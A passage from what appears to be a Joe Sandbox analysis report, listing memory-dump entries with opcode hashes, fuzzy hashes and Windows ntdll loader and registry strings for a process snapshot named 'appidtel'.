                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: cf51a2a2ddc61cbc7b97d78f57b93faf97d1e15911687ed3e15c09dd73670456
                                          • Instruction ID: 6ec52283dfb69253408dd8d457fde1f3be3a0cc3d4df5c5b620a4d54d1d3f2ce
                                          • Opcode Fuzzy Hash: cf51a2a2ddc61cbc7b97d78f57b93faf97d1e15911687ed3e15c09dd73670456
                                          • Instruction Fuzzy Hash: FF417C76E00219AFEB14DAD5C8C1BEEB7BCAB14700F04406BE955FB290D7749E458BA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: da2d7d99cf1c2e9b79cd3e6b49e6c3d86187e886d66af37bfe043cdf181d2c08
                                          • Instruction ID: f7fbe7a13fdc5ab6febba8724f7185df0b0d1301a336d9c0b394ca77527b019f
                                          • Opcode Fuzzy Hash: da2d7d99cf1c2e9b79cd3e6b49e6c3d86187e886d66af37bfe043cdf181d2c08
                                          • Instruction Fuzzy Hash: FC41BD359007588FFB22DBE6D944BAEBBB9FF45380F18046BD911AF791D6348902CB18
                                          Strings
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 03484899
                                          • LdrpCheckRedirection, xrefs: 0348488F
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03484888
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: 4ef288a3fa4e489205deb607061d984af3a35a0dd839e05d9abab5b78787fbdd
                                          • Instruction ID: 50c368ec8a514a024686af0516990e5a441dbf3bc5d47406f24ece0c2bb9b0f5
                                          • Opcode Fuzzy Hash: 4ef288a3fa4e489205deb607061d984af3a35a0dd839e05d9abab5b78787fbdd
                                          • Instruction Fuzzy Hash: 0441B336A003529FCB21EF5AD840A2BB7E4EF49750B0A095BEC54AF355D730E800CB99
                                          Strings
                                          • SXS: %s() passed the empty activation context data, xrefs: 034729FE
                                          • RtlCreateActivationContext, xrefs: 034729F9
                                          • Actx , xrefs: 034333AC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                          • API String ID: 0-859632880
                                          • Opcode ID: 131f4e9635bb111cca16c967667ec9b0cdb3c354259cc9b0dd97a2a495df9b68
                                          • Instruction ID: a7532e8fed9ec251fa40b7ef9b6d1debe640a7001bdb85aa0f6e547d36598aa0
                                          • Opcode Fuzzy Hash: 131f4e9635bb111cca16c967667ec9b0cdb3c354259cc9b0dd97a2a495df9b68
                                          • Instruction Fuzzy Hash: 943126366003059FDB26DF59D880F9BB7A4EB59724F09446AFD049F381D770E851CB94
                                          Strings
                                          • LdrpInitializeTls, xrefs: 03471A47
                                          • minkernel\ntdll\ldrtls.c, xrefs: 03471A51
                                          • DLL "%wZ" has TLS information at %p, xrefs: 03471A40
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: 5203ada2da3b35746c3ef015e7d165f1990cfa3797e7cff94e6a83c003a7ce2e
                                          • Instruction ID: 174572473933632883d2df9ed7f8481ac6b679220473e1c549b9aa3beb6f4c2c
                                          • Opcode Fuzzy Hash: 5203ada2da3b35746c3ef015e7d165f1990cfa3797e7cff94e6a83c003a7ce2e
                                          • Instruction Fuzzy Hash: 5A31F871A40300AFE710EF85CC85FAA7ABCEB4A754F09419FE505BF290D770AD448798
                                          Strings
                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0344127B
                                          • @, xrefs: 034412A5
                                          • BuildLabEx, xrefs: 0344130F
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 0-3051831665
                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction ID: c8e94ac1018d5c3d56c0e202d3b9a38c3647afba4c57ba8c91a909c2c36de648
                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction Fuzzy Hash: A6318176900618AFEB11EF96CC44EDEBBBDEB84750F004436F514AF260E734DA458B58
                                          Strings
                                          • LdrpInitializationFailure, xrefs: 034820FA
                                          • minkernel\ntdll\ldrinit.c, xrefs: 03482104
                                          • Process initialization failed with status 0x%08lx, xrefs: 034820F3
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: 625ee2300365d84181534caba3dcb6d5f06f19be633c8cec646fc7d335ea646e
                                          • Instruction ID: 4269836b269f3f6f269ae8ccaf634d3626fff3757197d2560137a709e4c8b0c1
                                          • Opcode Fuzzy Hash: 625ee2300365d84181534caba3dcb6d5f06f19be633c8cec646fc7d335ea646e
                                          • Instruction Fuzzy Hash: C9F0F435640318AFD614FB49DC42F9E77ACEB40B44F14045AFA007F282D2F0A5508A84
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 67141a4821467e506ef22680aeb55b11f03d485ca51cc93d865c0d5885c59ebe
                                          • Instruction ID: 6261c111105a7a7506c7a3b25a62cb4ee6804ea9bae97453adb334f122289f9f
                                          • Opcode Fuzzy Hash: 67141a4821467e506ef22680aeb55b11f03d485ca51cc93d865c0d5885c59ebe
                                          • Instruction Fuzzy Hash: 97716A75A006099FDB01DFA9C980BAEB7F8EF08704F15406AE901EF351EA34ED51CB69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@
                                          • API String ID: 0-149943524
                                          • Opcode ID: 430d886e69f1028240896448c712f89929f64e19c78e548b36dffef928644c83
                                          • Instruction ID: 59f93f2220c3b4b23552eaaf4483bf4b45668adb9b3a45a8a49e6b903ff65b4f
                                          • Opcode Fuzzy Hash: 430d886e69f1028240896448c712f89929f64e19c78e548b36dffef928644c83
                                          • Instruction Fuzzy Hash: 0E328A74508B118BC724CF19C4807BFB7E5AFC6640F19499FE8999F2A0E774C861CB9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: c2177410d388e18b8cfd97be2972558a3ffddc15aa21c833cae72b0e8525e3c6
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: B9C1CD392243899FD764CF29C844B6BFBE5BF84318F088A2EF5958E290D774D505CB49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: cd465815cafab5cd7d87abe044069da4bb125c0dc84545ed1fb4ad0acf033134
                                          • Instruction ID: 8abb5d77165759cca728ff7d8833c42d9e9405d91af8c568ad672dfc4640a4c4
                                          • Opcode Fuzzy Hash: cd465815cafab5cd7d87abe044069da4bb125c0dc84545ed1fb4ad0acf033134
                                          • Instruction Fuzzy Hash: 2A615B71E003189FDB14DFA9C840BAEBBB9FB48700F1541AEE559EF291D731A941CB58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$
                                          • API String ID: 0-233714265
                                          • Opcode ID: b2ff1f4767c9b476817df526dfe3738e7581f4df3f270894dd213460db144a8b
                                          • Instruction ID: 7db25ebee21cbfe02b7d6f1157e7e27a90e80f6449f138ecc6ad5e458301aab7
                                          • Opcode Fuzzy Hash: b2ff1f4767c9b476817df526dfe3738e7581f4df3f270894dd213460db144a8b
                                          • Instruction Fuzzy Hash: 8C61A975A00B499FDB20EFA5C580BAEB7B1FF04304F18456ED5156F280CBB4A96ACB48
                                          Strings
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0340A2FB
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0340A309
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 04fcf5cae6d48fe0cd7c7e4982e96e01166a7e91208567ff2431530ee976b8c5
                                          • Instruction ID: 2f5b27fdeec2181107ecc587ce8e8f196832c024389f8ebaecc769b7b05def5c
                                          • Opcode Fuzzy Hash: 04fcf5cae6d48fe0cd7c7e4982e96e01166a7e91208567ff2431530ee976b8c5
                                          • Instruction Fuzzy Hash: 38418B35B04755DBDB11CF69C880BAAB7B4EF85700F1884AAEC10DF3A1E275D901CB59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@
                                          • API String ID: 0-380025441
                                          • Opcode ID: bbeb3a537aa616f3da78137d07cb2c7d2ce672f1bca60943eb51a4e85c17c1f0
                                          • Instruction ID: 5e2293aa01d83cb5ed85feced31d90895d93e0738621ad6e49dbec0b1f1c07c5
                                          • Opcode Fuzzy Hash: bbeb3a537aa616f3da78137d07cb2c7d2ce672f1bca60943eb51a4e85c17c1f0
                                          • Instruction Fuzzy Hash: 3931B37A5087049FD310DF29C480A5BBBE8FF8A654F48492FF9958B210EA31DD05CB97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 0bcaa2c0aae1b69232a2b8cdadbbb87ef556c8d081fd24c7ddc64690cf8d4ae9
                                          • Instruction ID: 7160fc0d38c5c122c37a73373d3c76f2826de9300bdc854144993601ef58de7b
                                          • Opcode Fuzzy Hash: 0bcaa2c0aae1b69232a2b8cdadbbb87ef556c8d081fd24c7ddc64690cf8d4ae9
                                          • Instruction Fuzzy Hash: 52822875E00218DADB24CFA9C980BAEF7B5BF49710F18826AD859AF390D7309D45CB58
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3958fccf7351f81dd6b11a041843b73249ec5c747fe4f7148f203b13b2e3dca
                                          • Instruction ID: 4aa2869d9b9671becd49e55ba6f3ba0833772785a2290520f462a84fda5ae5d1
                                          • Opcode Fuzzy Hash: b3958fccf7351f81dd6b11a041843b73249ec5c747fe4f7148f203b13b2e3dca
                                          • Instruction Fuzzy Hash: 49A15875608741DFD320DF29C480A2BBBE9BF88314F18496EE5959F390E730E945CB9A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: deb3ba9870c90018aca2a46d86783c26eb456061761e61df2464a00ab87d555f
                                          • Instruction ID: b08f57073e848141cbf93317286d539fbe1d04bd15de9be44743da9f3edf876f
                                          • Opcode Fuzzy Hash: deb3ba9870c90018aca2a46d86783c26eb456061761e61df2464a00ab87d555f
                                          • Instruction Fuzzy Hash: DD414AB4D01688AFDB20DFA9C480AAEFBF4FB49340F18412FE559AB211D7309905CF64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 226e363219d4b1e02471ecc0e3140bc14646b922912ae576c4100d2c7f055710
                                          • Instruction ID: b324b2c708b2b45c9317bd634c589f17a883627bd0e3f06ee8b813507558a326
                                          • Opcode Fuzzy Hash: 226e363219d4b1e02471ecc0e3140bc14646b922912ae576c4100d2c7f055710
                                          • Instruction Fuzzy Hash: B0715975E0161A8FDB28DF99C5906EEBBB2BF48740F19816FE845AF340D7399801CB58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction ID: b6aa3207bcecf1a3c3c8af85394e6952eec7585f3f250ddb7c944c5616662640
                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction Fuzzy Hash: F8616B76E10219AFDB21DF95C840BAEBBB4FF84710F14456AE810BB3A0D7749A05CB59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction ID: a0278fbeeab6bd648a20786a9635fa5e297669957d6253d5e23df02651982eca
                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction Fuzzy Hash: 6F51AA72514701AFE721EF55C840F6BB7E8FB84750F04092EB5849F290E7B4E919CB9A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: daf6604538063e8afb0435175e1dd9abb62dc463a0bc93a1248e186b1959aeae
                                          • Instruction ID: e044a215fef7dfcb18a3ea0a73e0714ffd87cd3a8654ccf32c4365df85e45919
                                          • Opcode Fuzzy Hash: daf6604538063e8afb0435175e1dd9abb62dc463a0bc93a1248e186b1959aeae
                                          • Instruction Fuzzy Hash: E941C07AA087019FE710DF65C880B6BB7D8AF88604F44092FF994DF240E774C955879A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PreferredUILanguages
                                          • API String ID: 0-1884656846
                                          • Opcode ID: 31e0799afda22286b256e0b6ce3a9eb3ef47de0a09aaf48c183490baece5ef8d
                                          • Instruction ID: 570bf3e210d22f62b034ba7c11e62ea9528fc01785976419f20001247ba64674
                                          • Opcode Fuzzy Hash: 31e0799afda22286b256e0b6ce3a9eb3ef47de0a09aaf48c183490baece5ef8d
                                          • Instruction Fuzzy Hash: B1419036D00219ABDB21DA95C880BEFB7B9EF44650F09116BE952AF350D6B0DE41C7B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 95c317007d2cda40e70966520c33bb971cc4c169fbf0aa6162ff01ebd8914ae4
                                          • Instruction ID: e3ff6a39a73fd13e4f470622c7aed85bdc2b04e950f0dc77a2447ed99d5f0a0d
                                          • Opcode Fuzzy Hash: 95c317007d2cda40e70966520c33bb971cc4c169fbf0aa6162ff01ebd8914ae4
                                          • Instruction Fuzzy Hash: 1F4135B5D0062DAFDB21DA51CC84FDEB77CAB45714F0145EAEA08AF140DB709E898F98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: verifier.dll
                                          • API String ID: 0-3265496382
                                          • Opcode ID: bed2d730de2b20964c0f9f69cf12be5366d5ff3233c2b9f85f6c1afe55d36549
                                          • Instruction ID: 3075fcd6baa45c10ae6fad8649b6ba78178d09118567586142b30eb7f80d73d2
                                          • Opcode Fuzzy Hash: bed2d730de2b20964c0f9f69cf12be5366d5ff3233c2b9f85f6c1afe55d36549
                                          • Instruction Fuzzy Hash: A131A075B107029FDB24EF299850A3BB7E5EB49310F5988BBE5049F385E7318C818B98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: kLsE
                                          • API String ID: 0-3058123920
                                          • Opcode ID: 0689dd3d333841febc5ff4bba33b5f28f067fd13372b7120cba6e8d54d13861e
                                          • Instruction ID: 8cd3670b3fb1a4e564ed167129e14d6d9d69a9f378b120ff03fab88922ba463a
                                          • Opcode Fuzzy Hash: 0689dd3d333841febc5ff4bba33b5f28f067fd13372b7120cba6e8d54d13861e
                                          • Instruction Fuzzy Hash: 964135355017504EE730FBA9E884B667FD4EB50724F1D052EE9506E3C9CBB94492C7A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Flst
                                          • API String ID: 0-2374792617
                                          • Opcode ID: 8050cb8741f298d8c5ca56f1f74ef1d61333be5335d14a062110cce93777c5ba
                                          • Instruction ID: 95b9b9f6b2f06efadc529e4201c0cf2f8291d37083bedf71c0700ab9ce70792d
                                          • Opcode Fuzzy Hash: 8050cb8741f298d8c5ca56f1f74ef1d61333be5335d14a062110cce93777c5ba
                                          • Instruction Fuzzy Hash: 444198B96053019FC314CF19C584A66FBE4EB8A710F1885AFE859CF381EB71D942CB99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: L4QwL4Qw
                                          • API String ID: 0-1417497668
                                          • Opcode ID: 7bc7f51910a0c567519ef887d56a09a1f13112f5f62984187cad1e63dea94579
                                          • Instruction ID: f4cc0424d7e126e661830622ac40c8491a6ee21d27c377f58d8b71a1facfef20
                                          • Opcode Fuzzy Hash: 7bc7f51910a0c567519ef887d56a09a1f13112f5f62984187cad1e63dea94579
                                          • Instruction Fuzzy Hash: 4B21D03AA00B10AFC322EF198840B1ABBB5FB84B50F16042EFA559F741D770E804CB94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 795caf7ec9384c8f9cda794eeebd47ffe241aebca68390c56710fe13aa456634
                                          • Instruction ID: 1f23c75fd00641c470098f6a99e3fd23ab49696c46718ca0a5fee3a3c0e441c8
                                          • Opcode Fuzzy Hash: 795caf7ec9384c8f9cda794eeebd47ffe241aebca68390c56710fe13aa456634
                                          • Instruction Fuzzy Hash: 3511843070C6028BEB24CD1DD95063BB295EB87214F3885BBD4A2CF3D0D671DC428B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrCreateEnclave
                                          • API String ID: 0-3262589265
                                          • Opcode ID: 4ecae6ad56c7030fad3ccc3f98043a02d28887982d62676a34948fa11b87062b
                                          • Instruction ID: 73cf99791334ac2f313a6d6a35a394c09d7e8f69143108e8174813fd137c2e54
                                          • Opcode Fuzzy Hash: 4ecae6ad56c7030fad3ccc3f98043a02d28887982d62676a34948fa11b87062b
                                          • Instruction Fuzzy Hash: 2421F3B59183449FC310EF1AC844A5FFBE8EBD5B40F144A1FB9A09A250D7B09505CB96
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2ad17d3b4d0b07209306edc0c52363eaffc82fb51c8fb7be8004f6b1bba5921
                                          • Instruction ID: 383b6708da14d349463bbba35b2ce73ecbef81e8d9162d9733b89d598066fc26
                                          • Opcode Fuzzy Hash: b2ad17d3b4d0b07209306edc0c52363eaffc82fb51c8fb7be8004f6b1bba5921
                                          • Instruction Fuzzy Hash: E542B075E006168FDB14CF59C480AAEFBB6FF88314B18816EE952AF351D734E842CB94
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14942f331dae2135da3efc873bfb86602ab12aa2ee43290da70edf381a051f33
                                          • Instruction ID: cb7ed37cb6a80eec662abf65fcfb97b9c883ab3578e41996f646121cdcc7ff33
                                          • Opcode Fuzzy Hash: 14942f331dae2135da3efc873bfb86602ab12aa2ee43290da70edf381a051f33
                                          • Instruction Fuzzy Hash: FF329C75E002299FCB14DFA8C890AAEBBB1FF44714F58402AE815BF390E7359951CB99
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96c918394259bd88fa57399143bed37a9097c9eefcd15e82851a9d940009b4f6
                                          • Instruction ID: 1d2a29784fabb80784115e40b82d8ced72dfc5b55140732025ec1d1bdc14e620
                                          • Opcode Fuzzy Hash: 96c918394259bd88fa57399143bed37a9097c9eefcd15e82851a9d940009b4f6
                                          • Instruction Fuzzy Hash: 3B22AB74204A618BDB25CF2DC094377B7F1AF64305F08849BE8968F396E735E492CB69
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c22abd2fd23feaaa29f584fa68c6b5776484560e2764d03b288ca109edf64465
                                          • Instruction ID: 23763a5212be947e01dbb70f1f9cb5aee5a2d780cd86bcabed86e2d610fbc061
                                          • Opcode Fuzzy Hash: c22abd2fd23feaaa29f584fa68c6b5776484560e2764d03b288ca109edf64465
                                          • Instruction Fuzzy Hash: 9C22B139B102568FCB59CF59C490ABAF7B2FF89304B18456ED4529F342EB30E942CB94
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2aecaaab7745ad3f30eb7f2f349c9d86fb578fa96552804c7001d656cdacb7f4
                                          • Instruction ID: 516e1235193f9e7578f4be830977a3fe5a64482523d9f06989b3710e6fe78600
